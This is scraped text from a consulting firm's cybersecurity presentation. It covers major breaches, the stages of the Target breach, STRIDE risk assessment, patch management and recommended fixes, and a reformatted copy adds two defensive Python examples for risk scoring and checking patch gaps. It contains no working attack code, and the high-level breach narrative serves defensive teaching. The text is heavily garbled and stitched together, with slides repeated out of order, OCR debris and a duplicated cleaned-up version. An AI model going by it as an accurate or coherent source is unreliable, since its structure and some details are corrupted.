COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
• Gained access to a server that contained a SQL database and were able to download 70 million PII records of customers
• Attackers then gained access to the POS environment (which should have been walled off)
• Attackers then went on the darknet to find someone with knowledge of the POS system and how to inject code into the POS application
• Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
• Attackers then copied the credit card files to another server that had remote FTP ability and sent the files to themselves
RANSOMWARE – ANATOMY OF AN ATTACK
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach. The main reasons companies struggle are:
• Expansion of the attack surface
• Continued innovations in technology
• Lack of understanding of the company's information assets and their value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
• Lack of skilled resources (people and time)
• Lack of funds
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE | TECHNOLOGY | PROCESSES
THE PEOPLE CHALLENGE: Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE: The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE: Ensure best-practice processes and associated management frameworks are in place. Regular audits and reviews are important.
IMPLEMENTING A CYBERSECURITY PROGRAM
• Understand the organizational risk and where high-risk assets exist
• Risk assessments should be performed annually or when significant changes to the environment occur
• Stinnett uses Microsoft STRIDE threat modeling to semi-qualitatively measure cybersecurity risks, in order to identify, estimate and prioritize information security risks
Identification of Assets → Asset Locations → Classification of Assets → Threat Modeling → Calculated Risk Results
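The flow above (identify assets, record their location, classify them, model threats, calculate risk) is easier to see with numbers attached. The following is an added example and not Stinnett's own methodology or tooling: it assumes a 1-5 likelihood scale, a 1-5 impact scale and a classification weight as the semi-qualitative inputs, walks each asset through the six STRIDE categories, and ranks assets by their worst-case score. The asset inventory, threat entries and scales are constructed for illustration; it also serves the risk assessment slide that follows (what value the assets have, who would want the data, where it lives).

```python
"""Semi-qualitative risk scoring built around the STRIDE threat categories.
Added illustration, not the firm's own method: the 1-5 scales, classification
weights and the asset inventory below are constructed assumptions."""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

STRIDE = {
    "S": "Spoofing",
    "T": "Tampering",
    "R": "Repudiation",
    "I": "Information disclosure",
    "D": "Denial of service",
    "E": "Elevation of privilege",
}

# Classification drives the weight: losing a Restricted asset costs more than
# losing a Public one, whatever the threat. (Assumed scale.)
CLASSIFICATION_WEIGHT = {"Public": 1, "Internal": 2, "Confidential": 3, "Restricted": 4}


@dataclass
class Threat:
    category: str   # one of the STRIDE letters above
    likelihood: int  # 1 (rare) .. 5 (expected)
    impact: int      # 1 (negligible) .. 5 (severe)


@dataclass
class Asset:
    name: str
    location: str        # where the data lives (server, segment, hosting)
    classification: str  # key of CLASSIFICATION_WEIGHT
    threats: List[Threat] = field(default_factory=list)


def validate(threat: Threat) -> None:
    """Reject entries outside the agreed scales so scores stay comparable."""
    if threat.category not in STRIDE:
        raise ValueError(f"unknown STRIDE category {threat.category!r}")
    for value in (threat.likelihood, threat.impact):
        if not 1 <= value <= 5:
            raise ValueError("likelihood and impact must be on a 1-5 scale")


def threat_score(asset: Asset, threat: Threat) -> int:
    """Risk = likelihood x impact x classification weight."""
    validate(threat)
    return threat.likelihood * threat.impact * CLASSIFICATION_WEIGHT[asset.classification]


def asset_risk(asset: Asset) -> Dict[str, int]:
    """Score per STRIDE category for one asset, plus the worst case under 'max'."""
    scores = {STRIDE[t.category]: threat_score(asset, t) for t in asset.threats}
    scores["max"] = max(scores.values(), default=0)
    return scores


def prioritize(assets: List[Asset]) -> List[Tuple[str, str, int]]:
    """Rank assets by worst-case score so remediation effort goes to the top."""
    ranked = [(a.name, a.location, asset_risk(a)["max"]) for a in assets]
    return sorted(ranked, key=lambda row: row[2], reverse=True)


# Constructed inventory of the kind of assets the slides list.
INVENTORY = [
    Asset("Cardholder database", "POS segment / SQL server", "Restricted",
          [Threat("I", 4, 5), Threat("E", 3, 5)]),
    Asset("Employee records", "HR file share", "Confidential",
          [Threat("I", 3, 4), Threat("T", 2, 3)]),
    Asset("Marketing website", "Hosted, internet facing", "Public",
          [Threat("D", 4, 3), Threat("T", 3, 2)]),
]

if __name__ == "__main__":
    for name, location, score in prioritize(INVENTORY):
        print(f"{score:4d}  {name:22s} ({location})")
```

The multiplication is deliberately simple; what matters for a non-technical reviewer is that every asset was scored on the same scales and that the ranking can be traced back to a stated likelihood, impact and classification rather than to a gut feeling.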
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is understanding the Company's information assets:
• What value do the assets have?
- Credit card data
- Employee or customer records
- Bank accounts
- Intellectual property
- Trade secrets
- Insider knowledge
• Who would want the data?
• Data location
BASELINE GAP ANALYSIS
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place
• Evaluate control design as it relates to commonly accepted framework(s)
• Identify control gaps and create a baseline for cybersecurity maturity in the organization
CYBERSECURITY FAILURES AND FIXES
Patch Management – A patch management process is a company's strategy for ensuring that its IT devices are properly updated (patched) to reflect the latest software update or release from the vendor. Most companies fail to implement sound patch management processes and procedures:
• 99% of exploited vulnerabilities were compromised more than a year after the patch was published
• Companies do not know all of the information devices in their network and are therefore unable to adequately assess their patch management process
User and Administrator Level Access – Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied as much as possible. Within the IT department, the failure of least privilege can result in multiple individuals and IDs with access to and/or knowledge of higher-level functions within the environment.
User Cybersecurity Training and Awareness – Companies often fail to implement basic end-user training around cybersecurity. Often the uneducated or untrained end user is the cyber attacker's first entry point into the company.
CYBERSECURITY FAILURES AND FIXES
FIXES
• Obtain at least a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device's risk relating to patches
• Focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems)
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval)
• Implement a continual end-user training program
• Ensure backups and recovery plans work as intended and are properly segregated
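Two of the patch management points above (devices nobody has inventoried cannot be assessed, and patches left unapplied for over a year are where exploitation concentrates) can be turned into a repeatable baseline check. The following is an added example, not the firm's own tooling or the Verizon report's method: it assumes a device inventory kept as CSV with a "patch_published" and "patch_applied" date per device, reconciles it against a list of hostnames actually seen on the network, and ranks the unpatched devices with internet-facing ones first. The inventory, the discovered host list and the assessment date are constructed for illustration.

```python
"""Patch-management baseline check. Added example, not the firm's own tooling:
reconciles a constructed device inventory against constructed discovery results,
then ranks devices whose vendor patch has been available but is not applied."""
import csv
from datetime import date
from io import StringIO
from typing import Dict, List

# Constructed inventory: what the IT department believes it owns.
INVENTORY_CSV = """hostname,internet_facing,software,patch_published,patch_applied
web-01,yes,Apache HTTP Server,2016-01-15,
web-02,yes,Apache HTTP Server,2016-01-15,2016-02-01
fs-01,no,Windows Server,2016-09-10,
hr-01,no,Java Runtime,2015-03-02,
"""

# Constructed discovery output (what an authorised asset scan or DHCP export
# actually saw on the network). Two hosts have no inventory record.
DISCOVERED = ["web-01", "web-02", "fs-01", "hr-01", "printer-07", "camera-lobby"]

# Constructed assessment date (the presentation date).
AS_OF = date(2017, 10, 27)


def load_inventory(text: str) -> List[Dict[str, str]]:
    """Parse the CSV inventory into one dict per device."""
    return list(csv.DictReader(StringIO(text)))


def unknown_devices(inventory: List[Dict[str, str]], discovered: List[str]) -> List[str]:
    """Hosts seen on the network that no inventory record covers; these cannot be
    assessed for patches at all, which is the gap the slide describes."""
    known = {row["hostname"] for row in inventory}
    return sorted(host for host in discovered if host not in known)


def patch_age_days(row: Dict[str, str], today: date) -> int:
    """Days the vendor patch has been available but not applied; 0 if applied."""
    if row["patch_applied"]:
        return 0
    return (today - date.fromisoformat(row["patch_published"])).days


def rank_patch_gaps(inventory: List[Dict[str, str]], today: date,
                    max_age_days: int = 365) -> List[Dict[str, object]]:
    """Unpatched devices ordered by priority: internet-facing first, then oldest gap.
    'overdue' marks gaps older than max_age_days (a year, per the slide's statistic)."""
    gaps = []
    for row in inventory:
        age = patch_age_days(row, today)
        if age == 0:
            continue
        gaps.append({
            "hostname": row["hostname"],
            "software": row["software"],
            "age_days": age,
            "internet_facing": row["internet_facing"].strip().lower() == "yes",
            "overdue": age > max_age_days,
        })
    return sorted(gaps, key=lambda g: (not g["internet_facing"], -g["age_days"]))


if __name__ == "__main__":
    inventory = load_inventory(INVENTORY_CSV)
    print("Not in inventory:", ", ".join(unknown_devices(inventory, DISCOVERED)) or "none")
    for gap in rank_patch_gaps(inventory, AS_OF):
        flag = "OVERDUE" if gap["overdue"] else "open"
        exposure = "internet-facing" if gap["internet_facing"] else "internal"
        print(f"{gap['hostname']:10s} {gap['software']:20s} {gap['age_days']:5d} days  {flag}  ({exposure})")
```

The two lists produced here are the baseline the slides call for: the unknown-device list is the inventory gap to close first (a device you do not know about cannot be patched), and the ranked gap list is the patch backlog ordered the same way the fixes slide suggests, internet-facing and known-vulnerable software ahead of internal systems.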
QUESTIONS
www.STINNETT-ASSOCIATES.com | 888-808-1795
Stinnett & Associates, 8811 S Yale Ave, Suite 300
Tulsa, OK 74137
Main Number: 918-728-3300
ContactUs@Stinnett-Associates.com
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
